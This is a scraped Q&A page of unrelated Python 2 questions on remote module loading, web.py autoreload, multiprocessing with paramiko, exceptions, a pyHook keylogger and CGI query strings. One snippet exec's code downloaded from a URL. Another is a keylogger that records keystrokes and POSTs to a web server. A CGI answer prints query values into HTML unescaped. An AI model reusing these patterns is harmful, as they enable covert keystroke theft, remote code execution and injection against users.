Importing *.py from url - python-2.7

I want to import some python functions from url for security purposes.
I got a solution from here:
How can a Python module be imported from a URL?
It kind of works; I can run first function (func1) fine, but when I try to run second function (func2) then python says func2 is not defined, why is that so ?
module.py on webserver:
def func1(string):
data = string+"world"
return data
def func2(string):
data = string+"bar"
return data
main.py on my pc:
import urllib
def import_py_from_url(URL):
exec urllib.urlopen(URL).read() in globals()
import_py_from_url("http://somehost.com/module.py")
#try first function
str = "hello "
data = func1(str)
print (data) # OUTPUT: hello world
#try seccond function
str = "foo "
data = func2(str)
print (data) # OUTPUT: NameError: name 'func2' is not defined
Is it even possible to do what i am trying to achive ? Not much info about it around.

Related

web.py running main twice, ignoring changes

I have a simple web.py app that reads a config file and serves to URL paths. However I get two strange behaviors. One, changes made to data in the Main are not reflected in the results of GET. Two, Main appears to run twice.
Desired behavior is modifying data in Main will cause methods to see modified data, and not having main re-run.
Questions:
What is really happening here, that mydict is not modified in either
GET.
Why am I getting some code running twice.
Simplest path to desired behavior (most important)
Pythonic path to desired behavior (least important)
From pbuck (Accepted Answer): Answer for 3.) is replace
app = web.application(urls, globals())
with:
app = web.application(urls, globals(), autoreload=False)
Same behavior on pythons Linux (CentOS 6 python 2.6.6) and MacBook (brew python 2.7.12)
When started I get:
$ python ./foo.py 8080
Initializing mydict
Modifying mydict
http://0.0.0.0:8080/
When queried with:
wget http://localhost:8080/node/first/foo
wget http://localhost:8080/node/second/bar
Which results in (notice a second "Initializing mydict"):
Initializing mydict
firstClass.GET called with clobber foo
firstClass.GET somevalue is something static
127.0.0.1:52480 - - [17/Feb/2017 17:30:42] "HTTP/1.1 GET /node/first/foo" - 200 OK
secondClass.GET called with clobber bar
secondClass.GET somevalue is something static
127.0.0.1:52486 - - [17/Feb/2017 17:30:47] "HTTP/1.1 GET /node/second/bar" - 200 OK
Code:
#!/usr/bin/python
import web
urls = (
'/node/first/(.*)', 'firstClass',
'/node/second/(.*)', 'secondClass'
)
# Initialize web server, start it later at "app . run ()"
#app = web.application(urls, globals())
# Running web.application in Main or above does not change behavior
# Static Initialize mydict
print "Initializing mydict"
mydict = {}
mydict['somevalue'] = "something static"
class firstClass:
def GET(self, globarg):
print "firstClass.GET called with clobber %s" % globarg
print "firstClass.GET somevalue is %s" % mydict['somevalue']
return mydict['somevalue']
class secondClass:
def GET(self, globarg):
print "secondClass.GET called with clobber %s" % globarg
print "secondClass.GET somevalue is %s" % mydict['somevalue']
return mydict['somevalue']
if __name__ == '__main__':
app = web.application(urls, globals())
# read configuration files for initializations here
print "Modifying mydict"
mydict['somevalue'] = "something dynamic"
app.run()
Short answer, avoid using globals as they don't do what you think they do. Especially when you eventually deploy this under nginx / apache where there will (likely) be multiple processes running.
Longer answer
Why am I getting some code running twice?
Code, global to app.py, is running twice because it runs once, as it normally does. The second time is within the web.application(urls, globals()) call. Really, that call to globals() sets up module loading / re-loading. Part of that is re-loading all modules (including app.py). If you set autoreload=False in the web.applications() call, it won't do that.
What is really happening here, that mydict is not modified in either GET?
mydict is getting set to 'something dynamic', but then being re-set to 'something static' on second load. Again, set autoreload=False and it will work as you expect.
Shortest path?
autoreload=False
Pythonic path?
.... well, I wonder why you have mydict['somevalue'] = 'something static' and mydict['somevalue'] = 'something dynamic' in your module this way: why not just set it once under '__main__'?

how to run two process in parallel using multiprocessing module in python

My requirement is to capture logs for a particular http request sent to server from project server log file. So have written two function and trying to execute them parallel using multiprocessing module. But only one is getting executed. not sure what is going wrong.
My two functions - run_remote_command - using paramiko module for executing the tail command on remote server(linux box) and redirecting the output to a file. And send_request - using request module to make POST request from local system (windows laptop) to the server.
Code:
import multiprocessing as mp
import paramiko
import datetime
import requests
def run_remote_command():
basename = "sampletrace"
suffixname = datetime.datetime.now().strftime("%y%m%d_%H%M%S")
filename = "_".join([basename, suffixname])
print filename
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname='x.x.x.x',username='xxxx',password='xxxx')
except Exception as e:
print "SSH Connecting to Host failed"
print e
ssh.close()
print ssh
tail = "tail -1cf /var/opt/logs/myprojectlogFile.txt >"
cmdStr = tail + " " + filename
result = ''
try:
stdin, stdout, stderr = ssh.exec_command(cmdStr)
print "error:" +str( stderr.readlines())
print stdout
#logger.info("return output : response=%s" %(self.resp_result))
except Exception as e:
print 'Run remote command failed cmd'
print e
ssh.close()
def send_request():
request_session = requests.Session()
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = "some data "
URL = "http://X.X.X.X:xxxx/request"
request_session.headers.update(headers)
resp = request_session.post(URL, data=data)
print resp.status_code
print resp.request.headers
print resp.text
def runInParallel(*fns):
proc = []
for fn in fns:
p = mp.Process(target=fn)
p.start()
proc.append(p)
for p in proc:
p.join()
if __name__ == '__main__':
runInParallel(run_remote_command, send_request)
Output: only the function send_request is getting executed. Even I check the process list of the server there is no tail process is getting created
200
Edited the code per the #Ilja comment

Returning error string from a method in python

I was reading a similar question Returning error string from a function in python. While I experimenting to create something similar in an Object Oriented programming so I could learn a few more things I got lost.
I am using Python 2.7 and I am a beginner on Object Oriented programming.
I can not figure out how to make it work.
Sample code checkArgumentInput.py:
#!/usr/bin/python
__author__ = 'author'
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class ArgumentValidationError(Error):
pass
def __init__(self, arguments):
self.arguments = arguments
def print_method(self, input_arguments):
if len(input_arguments) != 3:
raise ArgumentValidationError("Error on argument input!")
else:
self.arguments = input_arguments
return self.arguments
And on the main.py script:
#!/usr/bin/python
import checkArgumentInput
__author__ = 'author'
argsValidation = checkArgumentInput.ArgumentValidationError(sys.argv)
if __name__ == '__main__':
try:
result = argsValidation.validate_argument_input(sys.argv)
print result
except checkArgumentInput.ArgumentValidationError as exception:
# handle exception here and get error message
print exception.message
When I am executing the main.py script it produces two blank lines. Even if I do not provide any arguments as input or even if I do provide argument(s) input.
So my question is how to make it work?
I know that there is a module that can do that work for me, by checking argument input argparse but I want to implement something that I could use in other cases also (try, except).
Thank you in advance for the time and effort reading and replying to my question.
OK. So, usually the function sys.argv[] is called with brackets in the end of it, and with a number between the brackets, like: sys.argv[1]. This function will read your command line input. Exp.: sys.argv[0] is the name of the file.
main.py 42
In this case main.py is sys.argv[0] and 42 is sys.argv[1].
You need to identifi the string you're gonna take from the command line.
I think that this is the problem.
For more info: https://docs.python.org/2/library/sys.html
I made some research and I found this useful question/ answer that helped me out to understand my error: Manually raising (throwing) an exception in Python
I am posting the correct functional code under, just in case that someone will benefit in future.
Sample code checkArgumentInput.py:
#!/usr/bin/python
__author__ = 'author'
class ArgumentLookupError(LookupError):
pass
def __init__(self, *args): # *args because I do not know the number of args (input from terminal)
self.output = None
self.argument_list = args
def validate_argument_input(self, argument_input_list):
if len(argument_input_list) != 3:
raise ValueError('Error on argument input!')
else:
self.output = "Success"
return self.output
The second part main.py:
#!/usr/bin/python
import sys
import checkArgumentInput
__author__ = 'author'
argsValidation = checkArgumentInput.ArgumentLookupError(sys.argv)
if __name__ == '__main__':
try:
result = argsValidation.validate_argument_input(sys.argv)
print result
except ValueError as exception:
# handle exception here and get error message
print exception.message
The following code prints: Error on argument input! as expected, because I violating the condition.
Any way thank you all for your time and effort, hope this answer will help someone else in future.

Python keylogger: an integer is required

I am trying to make a keylogger that sends text to a webserver. Using pyHook, and httplib2, I was able to successfully make them work separately. However, when I try to combine the two, I get the error:
An integer is required
I honestly have no idea why this is caused. Both functions work by theirselves, so why can't I combine them? Any suggestions?
Thanks!
import pyHook
import pythoncom
import time
from httplib2 import Http
from urllib import urlencode
h = Http()
log_file = "control.txt"
message = ""
f = open(log_file,"a")
def pressed_chars(event):
if event.Ascii:
global message
char = chr(event.Ascii)
if char == "q":
f.close()
exit()
if event.Ascii == 13:
f.write("\n")
data = dict(cmd="openurl")
testVar = h.request("http://www.**********/submit.php", "POST", urlencode(data))
message = ""
f.write(char)
message = message+char
print(message)
proc = pyHook.HookManager()
proc.KeyDown = pressed_chars
proc.HookKeyboard()
pythoncom.PumpMessages()
It seems you are not returning True in pressed_chars . Try adding the line return True and see if it works!

How do I access the URL's Query String in a Python CGI script?

I'm trying to access the query string in a python script: in bash I'd access it using the ${QUERY_STRING} environment variable.
I've come across things like this:https://stackoverflow.com/a/2764822/32836, but this script, as run by Apache2:
#!/usr/bin/python
print self.request.query_string
prints nothing, and at the command line, the same produces this error:
$ ./testing.py
Traceback (most recent call last):
File "./testing.py", line 3, in <module>
print self.request.query_string
NameError: name 'self' is not defined
How do I read the query_string?
First of all, the 'self' keyword is only available once defined in a function, typically an object's. It is normally used the same way 'this' is used in other OOP languages.
Now, the snippet of code you were trying to use was intended for the Google App Engine, which you have not imported (nor installed, I presume). Since you are accustomed to using environment variables, here's what you can do:
#!/usr/bin/python
import os
print os.environ.get("QUERY_STRING", "No Query String in url")
However, I would advise you to use the cgi module instead. Read more about it here: http://docs.python.org/2/library/cgi.html
Just like to add an alternate method to accessing the QUERY_STRING value if you're running a cgi script, you could just do the following:
import os
print "content-type: text/html\n" # so we can print to the webpage
print os.environ['QUERY_STRING']
My testing and understanding is that this also works when there aren't any query strings in the URL, you'd just get an empty string.
This is confirmed to be working on 2.7.6, view all environment variables like so:
#!/usr/bin/python
import os
print "Content-type: text/html\r\n\r\n";
print "<font size=+1>Environment</font><\br>";
for param in os.environ.keys():
print "<b>%20s</b>: %s<\br>" % (param, os.environ[param])
This snippet of code was obtained from a TutorialsPoint tutorial on CGI Programming with Python.
Although, as zombie_raptor_jesus mentioned, it's probably better to use Python's CGI module, with FieldStorage to make things easier.
Again from the above tutorial:
# Import modules for CGI handling
import cgi, cgitb
# Create instance of FieldStorage
form = cgi.FieldStorage()
# Get data from fields
first_name = form.getvalue('first_name')
last_name = form.getvalue('last_name')
Will save values from the Query String first_name=Bobby&last_name=Ray
This is how I capture in Python 3 from CGI (A) URL, (B) GET parameters and (C) POST data:
I am using these methods on Windows Server running Python 3 using CGI via MIIS.
import sys, os, io
# CAPTURE URL
myDomainSelf = os.environ.get('SERVER_NAME')
myPathSelf = os.environ.get('PATH_INFO')
myURLSelf = myDomainSelf + myPathSelf
# CAPTURE GET DATA
myQuerySelf = os.environ.get('QUERY_STRING')
# CAPTURE POST DATA
myTotalBytesStr=(os.environ.get('HTTP_CONTENT_LENGTH'))
if (myTotalBytesStr == None):
myJSONStr = '{"error": {"value": true, "message": "No (post) data received"}}'
else:
myTotalBytes=int(os.environ.get('HTTP_CONTENT_LENGTH'))
myPostDataRaw = io.open(sys.stdin.fileno(),"rb").read(myTotalBytes)
myPostData = myPostDataRaw.decode("utf-8")
# Write RAW to FILE
mySpy = "myURLSelf: [" + str(myURLSelf) + "]\n"
mySpy = mySpy + "myQuerySelf: [" + str(myQuerySelf) + "]\n"
mySpy = mySpy + "myPostData: [" + str(myPostData) + "]\n"
# You need to define your own myPath here
myFilename = "spy.txt"
myFilePath = myPath + "\\" + myFilename
myFile = open(myFilePath, "w")
myFile.write(mySpy)
myFile.close()
=======================================================
Here are some other useful CGI environment vars:
AUTH_TYPE
CONTENT_LENGTH
CONTENT_TYPE
GATEWAY_INTERFACE
PATH_INFO
PATH_TRANSLATED
QUERY_STRING
REMOTE_ADDR
REMOTE_HOST
REMOTE_IDENT
REMOTE_USER
REQUEST_METHOD
SCRIPT_NAME
SERVER_NAME
SERVER_PORT
SERVER_PROTOCOL
SERVER_SOFTWARE
============================================
Hope this can help you.
import os
print('Content-Type: text/html\n\n<h1>Search query/h1>')
query_string = os.environ['QUERY_STRING']
SearchParams = [i.split('=') for i in query_string.split('&')] #parse query string
# SearchParams is an array of type [['key','value'],['key','value']]
# for example 'k1=val1&data=test' will transform to
#[['k1','val1'],['data','test']]
for key, value in SearchParams:
print('<b>' + key + '</b>: ' + value + '<br>\n')
with query_string = 'k1=val1&data=test'
it will echo:
<h1>Search query</h1>
<b>k1</b>: val1<br>
<b>data</b>: test<br>
image output